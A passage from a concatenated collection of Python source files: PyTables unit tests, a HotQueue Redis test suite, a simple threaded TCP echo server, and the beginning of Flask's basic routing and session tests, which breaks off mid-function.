print("Filename:", self.h5fname)
print("is_pytables_file?:", tables.is_pytables_file(self.h5fname))
self.assertNotEqual(tables.is_pytables_file(self.h5fname), False)
def test04_str(self):
str(self.h5file)
class FilePropertyTestCase(TestCase):
def setUp(self):
super(FilePropertyTestCase, self).setUp()
self.h5fname = tempfile.mktemp(".h5")
self.h5file = None
def tearDown(self):
if self.h5file:
self.h5file.close()
if os.path.exists(self.h5fname):
os.remove(self.h5fname)
super(FilePropertyTestCase, self).tearDown()
def test_get_filesize(self):
data = numpy.zeros((2000, 2000))
datasize = numpy.prod(data.shape) * data.dtype.itemsize
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', data)
h5_filesize = self.h5file.get_filesize()
self.h5file.close()
fs_filesize = os.stat(self.h5fname)[6]
self.assertGreaterEqual(h5_filesize, datasize)
self.assertEqual(h5_filesize, fs_filesize)
def test01_null_userblock_size(self):
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test02_null_userblock_size(self):
self.h5file = tables.open_file(self.h5fname, mode="w")
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, mode="r")
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test03_null_userblock_size(self):
USER_BLOCK_SIZE = 0
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), 0)
def test01_userblock_size(self):
USER_BLOCK_SIZE = 512
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.assertEqual(self.h5file.get_userblock_size(), USER_BLOCK_SIZE)
def test02_userblock_size(self):
USER_BLOCK_SIZE = 512
self.h5file = tables.open_file(
self.h5fname, mode="w", user_block_size=USER_BLOCK_SIZE)
self.h5file.create_array(self.h5file.root, 'array', [1, 2])
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, mode="r")
self.assertEqual(self.h5file.get_userblock_size(), USER_BLOCK_SIZE)
def test_small_userblock_size(self):
USER_BLOCK_SIZE = 12
self.assertRaises(ValueError, tables.open_file, self.h5fname, mode="w",
user_block_size=USER_BLOCK_SIZE)
def test_invalid_userblock_size(self):
USER_BLOCK_SIZE = 1025
self.assertRaises(ValueError, tables.open_file, self.h5fname, mode="w",
user_block_size=USER_BLOCK_SIZE)
# Test for reading a file that uses Blosc and created on a big-endian platform
@unittest.skipIf(not common.blosc_avail, 'Blosc not available')
class BloscBigEndian(common.TestFileMixin, TestCase):
h5fname = test_filename("blosc_bigendian.h5")
def test00_bigendian(self):
"""Checking compatibility with Blosc on big-endian machines."""
# Check that we can read the contents without problems (nor warnings!)
for dset_name in ('i1', 'i2', 'i4', 'i8'):
a = numpy.arange(10, dtype=dset_name)
dset = self.h5file.get_node('/'+dset_name)
self.assertTrue(common.allequal(a, dset[:]),
"Error in big-endian data!")
# Case test for Blosc and subprocesses (via multiprocessing module)
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(fn, qout=None):
fp = tables.open_file(fn)
if common.verbose:
print("About to load: ", fn)
rows = fp.root.table.where('(f0 < 10)')
if common.verbose:
print("Got the iterator, about to iterate")
next(rows)
if common.verbose:
print("Succeeded in one iteration\n")
fp.close()
if qout is not None:
qout.put("Done")
# From: Yaroslav Halchenko <debian@onerussian.com>
# Subject: Skip the unittest on kFreeBSD and Hurd -- locking seems to
# be N/A
#
# on kfreebsd /dev/shm is N/A
# on Hurd -- inter-process semaphore locking is N/A
@unittest.skipIf(not multiprocessing_imported,
'multiprocessing module not available')
@unittest.skipIf(platform.system().lower() in ('gnu', 'gnu/kfreebsd'),
"multiprocessing module is not supported on Hurd/kFreeBSD")
@unittest.skipIf(not common.blosc_avail, 'Blosc not available')
class BloscSubprocess(TestCase):
def test_multiprocess(self):
# Create a relatively large table with Blosc level 9 (large blocks)
h5fname = tempfile.mktemp(prefix="multiproc-blosc9-", suffix=".h5")
try:
size = int(3e5)
sa = numpy.fromiter(((i, i**2, i//3)
for i in range(size)), 'i4,i8,f8')
with tables.open_file(h5fname, 'w') as h5file:
h5file.create_table(
h5file.root, 'table', sa,
filters=tables.Filters(complevel=9, complib="blosc"),
chunkshape=(size // 3,))
if common.verbose:
print("**** Running from main process:")
_worker(h5fname)
if common.verbose:
print("**** Running from subprocess:")
try:
qout = mp.Queue()
except OSError:
print("Permission denied due to /dev/shm settings")
else:
ps = mp.Process(target=_worker, args=(h5fname, qout,))
ps.daemon = True
ps.start()
result = qout.get()
if common.verbose:
print(result)
finally:
os.remove(h5fname)
class HDF5ErrorHandling(TestCase):
def setUp(self):
super(HDF5ErrorHandling, self).setUp()
self._old_policy = tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY
def tearDown(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = self._old_policy
super(HDF5ErrorHandling, self).tearDown()
def test_silence_messages(self):
code = """
import tables
tables.silence_hdf5_messages(False)
tables.silence_hdf5_messages()
try:
tables.open_file(r'%s')
except tables.HDF5ExtError, e:
pass
"""
filename = tempfile.mktemp(prefix="hdf5-error-handling-", suffix=".py")
try:
with open(filename, 'w') as fp:
fp.write(code % filename)
p = subprocess.Popen([sys.executable, filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertNotIn("HDF5-DIAG", stderr.decode('ascii'))
finally:
os.remove(filename)
def test_enable_messages(self):
code = """
import tables
tables.silence_hdf5_messages()
tables.silence_hdf5_messages(False)
try:
tables.open_file(r'%s')
except tables.HDF5ExtError as e:
pass
"""
filename = tempfile.mktemp(prefix="hdf5-error-handling-", suffix=".py")
try:
with open(filename, 'w') as fp:
fp.write(code % filename)
p = subprocess.Popen([sys.executable, filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertIn("HDF5-DIAG", stderr.decode('ascii'))
finally:
os.remove(filename)
def _raise_exterror(self):
h5fname = tempfile.mktemp(".h5")
open(h5fname, 'wb').close()
try:
h5file = tables.open_file(h5fname)
h5file.close()
finally:
os.remove(h5fname)
def test_h5_backtrace_quiet(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = True
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNotNone(cm.exception.h5backtrace)
def test_h5_backtrace_verbose(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = "VERBOSE"
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNotNone(cm.exception.h5backtrace)
msg = str(cm.exception)
self.assertIn(cm.exception.h5backtrace[-1][-1], msg)
def test_h5_backtrace_ignore(self):
tables.HDF5ExtError.DEFAULT_H5_BACKTRACE_POLICY = False
with self.assertRaises(tables.HDF5ExtError) as cm:
self._raise_exterror()
self.assertIsNone(cm.exception.h5backtrace)
class TestDescription(TestCase):
def test_isdescription_inheritance(self):
# Regression test for gh-65
class TestDescParent(IsDescription):
c = Int32Col()
class TestDesc(TestDescParent):
pass
self.assertIn('c', TestDesc.columns)
def test_descr_from_dtype(self):
t = numpy.dtype([('col1', 'int16'), ('col2', float)])
descr, byteorder = descr_from_dtype(t)
self.assertIn('col1', descr._v_colobjects)
self.assertIn('col2', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['col1'], Col)
self.assertIsInstance(descr._v_colobjects['col2'], Col)
self.assertEqual(descr._v_colobjects['col1'].dtype, numpy.int16)
self.assertEqual(descr._v_colobjects['col2'].dtype, float)
def test_descr_from_dtype_rich_dtype(self):
header = [(('timestamp', 't'), 'u4'),
(('unit (cluster) id', 'unit'), 'u2')]
t = numpy.dtype(header)
descr, byteorder = descr_from_dtype(t)
self.assertEqual(len(descr._v_names), 2)
self.assertEqual(sorted(descr._v_names), ['t', 'unit'])
def test_descr_from_dtype_comp_01(self):
d1 = numpy.dtype([
('x', 'int16'),
('y', 'int16'),
])
d_comp = numpy.dtype([
('time', 'float64'),
('value', d1)
#('value', (d1, (1,)))
])
descr, byteorder = descr_from_dtype(d_comp)
self.assertTrue(descr._v_is_nested)
self.assertIn('time', descr._v_colobjects)
self.assertIn('value', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['time'], Col)
self.assertTrue(isinstance(descr._v_colobjects['value'],
tables.Description))
self.assertEqual(descr._v_colobjects['time'].dtype, numpy.float64)
def test_descr_from_dtype_comp_02(self):
d1 = numpy.dtype([
('x', 'int16'),
('y', 'int16'),
])
d_comp = numpy.dtype([
('time', 'float64'),
('value', (d1, (1,)))
])
with self.assertWarns(UserWarning):
descr, byteorder = descr_from_dtype(d_comp)
self.assertTrue(descr._v_is_nested)
self.assertIn('time', descr._v_colobjects)
self.assertIn('value', descr._v_colobjects)
self.assertEqual(len(descr._v_colobjects), 2)
self.assertIsInstance(descr._v_colobjects['time'], Col)
self.assertTrue(isinstance(descr._v_colobjects['value'],
tables.Description))
self.assertEqual(descr._v_colobjects['time'].dtype, numpy.float64)
def test_dtype_from_descr_is_description(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr(TestDescParent)
self.assertEqual(t, dtype)
def test_dtype_from_descr_is_description_instance(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr(TestDescParent())
self.assertEqual(t, dtype)
def test_dtype_from_descr_description_instance(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
desctiption = Description(TestDescParent().columns)
t = dtype_from_descr(desctiption)
self.assertEqual(t, dtype)
def test_dtype_from_descr_dict(self):
# See gh-152
dtype = numpy.dtype([('col1', 'int16'), ('col2', float)])
t = dtype_from_descr({'col1': Int16Col(), 'col2': FloatCol()})
self.assertEqual(t, dtype)
def test_dtype_from_descr_invalid_type(self):
# See gh-152
self.assertRaises(ValueError, dtype_from_descr, [])
def test_dtype_from_descr_byteorder(self):
# See gh-152
class TestDescParent(IsDescription):
col1 = Int16Col()
col2 = FloatCol()
t = dtype_from_descr(TestDescParent, byteorder='>')
self.assertEqual(t['col1'].byteorder, '>')
self.assertEqual(t['col2'].byteorder, '>')
def test_str_names(self):
# see gh-42
d = {'name': tables.Int16Col()}
descr = Description(d)
self.assertEqual(sorted(descr._v_names), sorted(d.keys()))
self.assertIsInstance(descr._v_dtype, numpy.dtype)
self.assertTrue(sorted(descr._v_dtype.fields.keys()),
sorted(d.keys()))
class TestAtom(TestCase):
def test_atom_attributes01(self):
shape = (10, 10)
a = Float64Atom(shape=shape)
self.assertEqual(a.dflt, 0.)
self.assertEqual(a.dtype, numpy.dtype((numpy.float64, shape)))
self.assertEqual(a.itemsize, a.dtype.base.itemsize)
self.assertEqual(a.kind, 'float')
self.assertEqual(a.ndim, len(shape))
# self.assertEqual(a.recarrtype, )
self.assertEqual(a.shape, shape)
self.assertEqual(a.size, a.itemsize * numpy.prod(shape))
self.assertEqual(a.type, 'float64')
def test_atom_copy01(self):
shape = (10, 10)
a = Float64Atom(shape=shape)
aa = a.copy()
self.assertEqual(aa.shape, shape)
def test_atom_copy02(self):
dflt = 2.0
a = Float64Atom(dflt=dflt)
aa = a.copy()
self.assertEqual(aa.dflt, dflt)
def test_atom_copy_override(self):
shape = (10, 10)
dflt = 2.0
a = Float64Atom(shape=shape, dflt=dflt)
aa = a.copy(dflt=-dflt)
self.assertEqual(aa.shape, shape)
self.assertNotEqual(aa.dflt, dflt)
self.assertEqual(aa.dflt, -dflt)
class TestCol(TestCase):
def test_col_copy01(self):
shape = (10, 10)
c = Float64Col(shape=shape)
cc = c.copy()
self.assertEqual(cc.shape, shape)
def test_col_copy02(self):
dflt = 2.0
c = Float64Col(dflt=dflt)
cc = c.copy()
self.assertEqual(cc.dflt, dflt)
def test_col_copy_override(self):
shape = (10, 10)
dflt = 2.0
pos = 3
c = Float64Col(shape=shape, dflt=dflt, pos=pos)
cc = c.copy(pos=2)
self.assertEqual(cc.shape, shape)
self.assertEqual(cc.dflt, dflt)
self.assertNotEqual(cc._v_pos, pos)
self.assertEqual(cc._v_pos, 2)
class TestSysattrCompatibility(TestCase):
def test_open_python2(self):
h5fname = test_filename("python2.h5")
with tables.open_file(h5fname, "r") as h5file:
self.assertTrue(h5file.isopen)
def test_open_python3(self):
h5fname = test_filename("python3.h5")
with tables.open_file(h5fname, "r") as h5file:
self.assertTrue(h5file.isopen)
def suite():
theSuite = unittest.TestSuite()
niter = 1
for i in range(niter):
theSuite.addTest(unittest.makeSuite(OpenFileFailureTestCase))
theSuite.addTest(unittest.makeSuite(NodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(NoNodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(DictNodeCacheOpenFile))
theSuite.addTest(unittest.makeSuite(CheckFileTestCase))
theSuite.addTest(unittest.makeSuite(ThreadingTestCase))
theSuite.addTest(unittest.makeSuite(PythonAttrsTestCase))
theSuite.addTest(unittest.makeSuite(StateTestCase))
theSuite.addTest(unittest.makeSuite(FlavorTestCase))
theSuite.addTest(unittest.makeSuite(UnicodeFilename))
theSuite.addTest(unittest.makeSuite(PathLikeFilename))
theSuite.addTest(unittest.makeSuite(FilePropertyTestCase))
theSuite.addTest(unittest.makeSuite(BloscBigEndian))
theSuite.addTest(unittest.makeSuite(BloscSubprocess))
theSuite.addTest(unittest.makeSuite(HDF5ErrorHandling))
theSuite.addTest(unittest.makeSuite(TestDescription))
theSuite.addTest(unittest.makeSuite(TestAtom))
theSuite.addTest(unittest.makeSuite(TestCol))
theSuite.addTest(unittest.makeSuite(TestSysattrCompatibility))
return theSuite
if __name__ == '__main__':
common.parse_argv(sys.argv)
common.print_versions()
unittest.main(defaultTest='suite')
## Local Variables:
## mode: python
## End:
|
tests.py
|
# -*- coding: utf-8 -*-
"""Test suite for the HotQueue library. To run this test suite, execute this
Python program (``python tests.py``). Redis must be running on localhost:6379,
and a list key named 'hotqueue:testqueue' will be created and deleted in db 0
several times while the tests are running.
"""
from time import sleep
import threading
import unittest
try:
import cPickle as pickle
except ImportError:
import pickle
from hotqueue import HotQueue
class DummySerializer(object):
"""Dummy serializer that deliberately discards messages on dumps."""
@staticmethod
def dumps(s):
return "foo"
@staticmethod
def loads(s):
return s
class HotQueueTestCase(unittest.TestCase):
def setUp(self):
"""Create the queue instance before the test."""
self.queue = HotQueue('testqueue')
def tearDown(self):
"""Clear the queue after the test."""
self.queue.clear()
def test_arguments(self):
"""Test that HotQueue.__init__ accepts arguments correctly, and that
the Redis key is correctly formed.
"""
kwargs = {
'name': "testqueue",
'serializer': DummySerializer,
'host': "localhost",
'port': 6379,
'db': 0}
# Instantiate the HotQueue instance:
self.queue = HotQueue(**kwargs)
# Ensure that the properties of the instance are as expected:
self.assertEqual(self.queue.name, kwargs['name'])
self.assertEqual(self.queue.key, "hotqueue:%s" % kwargs['name'])
self.assertEqual(self.queue.serializer, kwargs['serializer'])
# Instantiate a HotQueue instance with only the required args:
self.queue = HotQueue(kwargs['name'])
# Ensure that the properties of the instance are as expected:
self.assertEqual(self.queue.name, kwargs['name'])
self.assertEqual(self.queue.key, "hotqueue:%s" % kwargs['name'])
self.assertTrue(self.queue.serializer is pickle) # Defaults to cPickle
# or pickle, depending
# on the platform.
def test_consume(self):
"""Test the consume generator method."""
nums = [1, 2, 3, 4, 5, 6, 7, 8]
# Test blocking with timeout:
self.queue.put(*nums)
msgs = []
for msg in self.queue.consume(timeout=1):
msgs.append(msg)
self.assertEqual(msgs, nums)
# Test non-blocking:
self.queue.put(*nums)
msgs = []
for msg in self.queue.consume(block=False):
msgs.append(msg)
self.assertEqual(msgs, nums)
def test_cleared(self):
"""Test for correct behaviour if the Redis list does not exist."""
self.assertEqual(len(self.queue), 0)
self.assertEqual(self.queue.get(), None)
def test_get_order(self):
"""Test that messages are get in the same order they are put."""
alphabet = ['abc', 'def', 'ghi', 'jkl', 'mno']
self.queue.put(alphabet[0], alphabet[1], alphabet[2])
self.queue.put(alphabet[3])
self.queue.put(alphabet[4])
msgs = []
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
msgs.append(self.queue.get())
self.assertEqual(msgs, alphabet)
def test_length(self):
"""Test that the length of a queue is returned correctly."""
self.queue.put('a message')
self.queue.put('another message')
self.assertEqual(len(self.queue), 2)
def test_worker(self):
"""Test the worker decorator."""
colors = ['blue', 'green', 'red', 'pink', 'black']
# Test blocking with timeout:
self.queue.put(*colors)
msgs = []
@self.queue.worker(timeout=1)
def appender(msg):
msgs.append(msg)
appender()
self.assertEqual(msgs, colors)
# Test non-blocking:
self.queue.put(*colors)
msgs = []
@self.queue.worker(block=False)
def appender(msg):
msgs.append(msg)
appender()
self.assertEqual(msgs, colors)
# Test decorating a class method:
self.queue.put(*colors)
msgs = []
class MyClass(object):
@self.queue.worker(block=False)
def appender(self, msg):
msgs.append(msg)
my_instance = MyClass()
my_instance.appender()
self.assertEqual(msgs, colors)
def test_threaded(self):
"""Threaded test of put and consume methods."""
msgs = []
def put():
for num in range(3):
self.queue.put('message %d' % num)
sleep(0.1)
def consume():
for msg in self.queue.consume(timeout=1):
msgs.append(msg)
putter = threading.Thread(target=put)
consumer = threading.Thread(target=consume)
putter.start()
consumer.start()
for thread in [putter, consumer]:
thread.join()
self.assertEqual(msgs, ["message 0", "message 1", "message 2"])
def test_custom_serializer(self):
"""Test the use of a custom serializer and None as serializer."""
msg = "my message"
# Test using None:
self.queue.serializer = None
self.queue.put(msg)
self.assertEqual(self.queue.get(), msg)
self.queue.put({"a": 1})
self.assertEqual(self.queue.get(), "{'a': 1}") # Should be a string
# Test using DummySerializer:
self.queue.serializer = DummySerializer
self.queue.put(msg)
self.assertEqual(self.queue.get(), "foo")
if __name__ == "__main__":
unittest.main()
|
threadecho.py
|
# A simple echo server with threads
from socket import *
from threading import Thread
def echo_server(addr):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR,1)
sock.bind(addr)
sock.listen(5)
while True:
client, addr = sock.accept()
Thread(target=echo_handler, args=(client, addr), daemon=True).start()
def echo_handler(client, addr):
print('Connection from', addr)
with client:
while True:
data = client.recv(10000)
if not data:
break
client.sendall(data)
print('Connection closed')
if __name__ == '__main__':
echo_server(('',25000))
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
import re
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = client.open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
assert rv.data == b''
def test_options_on_multiple_rules(app, client):
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = client.open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT']
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['OPTIONS']
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', view_func=index, provide_automatic_options=False)
app.add_url_rule(
'/more', view_func=more, methods=['GET', 'POST'],
provide_automatic_options=False
)
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD']
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, 'options'):
rv = client.options('/')
else:
rv = client.open('/', method='OPTIONS')
assert rv.status_code == 405
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'POST']
if hasattr(client, 'options'):
rv = client.options('/more')
else:
rv = client.open('/more', method='OPTIONS')
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route('/', methods='GET POST')
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
# Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
app.add_url_rule('/options', 'options', options, methods=['options'])
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
rv = client.open('/options', method='OPTIONS')
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
assert client.get('/foo/').data == b'index'
assert client.get('/foo/bar').data == b'bar'
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
assert client.get('/foo/').data == b'index'
assert client.get('/foo/bar').data == b'bar'
def test_session(app, client):
@app.route('/set', methods=['POST'])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session['value'] = flask.request.form['value']
assert flask.session.accessed
assert flask.session.modified
return 'value set'
@app.route('/get')
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get('value', 'None')
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post('/set', data={'value': '42'}).data == b'value set'
assert client.get('/get').data == b'42'
def test_session_using_server_name(app, client):
app.config.update(
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/foo')
assert 'domain=example.com' in rv.headers['set-cookie'].lower()
assert 'path=/foo' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/')
assert 'path=/bar' in rv.headers['set-cookie'].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE='Lax',
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
assert 'domain=.example.com' in cookie
assert 'path=/' in cookie
assert 'secure' in cookie
assert 'httponly' not in cookie
assert 'samesite' in cookie
def test_session_using_samesite_attribute(app, client):
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
app.config.update(SESSION_COOKIE_SAMESITE='invalid')
with pytest.raises(ValueError):
client.get('/')
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite' not in cookie
app.config.update(SESSION_COOKIE_SAMESITE='Strict')
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite=strict' in cookie
app.config.update(SESSION_COOKIE_SAMESITE='Lax')
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite=lax' in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(
SERVER_NAME='localhost:5000',
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'testing'
rv = client.get('/', 'http://localhost:5000/')
assert 'domain' not in rv.headers['set-cookie'].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(
SERVER_NAME='127.0.0.1:5000',
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'testing'
rv = client.get('/', 'http://127.0.0.1:5000/')
assert 'domain=127.0.0.1' in rv.headers['set-cookie'].lower()
w = recwarn.pop(UserWarning)
assert 'cookie domain is an IP' in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and 'session is unavailable' in e.value.args[0]
with app.test_request_context():
assert flask.session.get('missing_key') is None
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(app, client):
permanent = True
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return text_type(flask.session.permanent)
rv = client.get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'(?i)\bexpires=([^;]+)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get('/test')
assert rv.data == b'True'
permanent = False
rv = client.get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
assert client.get('/').data == b'None'
assert client.get('/').data == b'42'
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route('/')
def dump_session_contents():
flask.session['t'] = (1, 2, 3)
flask.session['b'] = b'\xff'
flask.session['m'] = flask.Markup('<html>')
flask.session['u'] = the_uuid
flask.session['d'] = now
flask.session['t_tag'] = {' t': 'not-a-tuple'}
flask.session['di_t_tag'] = {' t__': 'not-a-tuple'}
flask.session['di_tag'] = {' di': 'not-a-dict'}
return '', 204
with client:
client.get('/')
s = flask.session
assert s['t'] == (1, 2, 3)
assert type(s['b']) == bytes
assert s['b'] == b'\xff'
assert type(s['m']) == flask.Markup
assert s['m'] == flask.Markup('<html>')
assert s['u'] == the_uuid
assert s['d'] == now
assert s['t_tag'] == {' t': 'not-a-tuple'}
assert s['di_t_tag'] == {' t__': 'not-a-tuple'}
assert s['di_tag'] == {' di': 'not-a-dict'}
def test_session_cookie_setting(app):
is_permanent = True
@app.route('/bump')
def bump():
rv = flask.session['foo'] = flask.session.get('foo', 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route('/read')
def read():
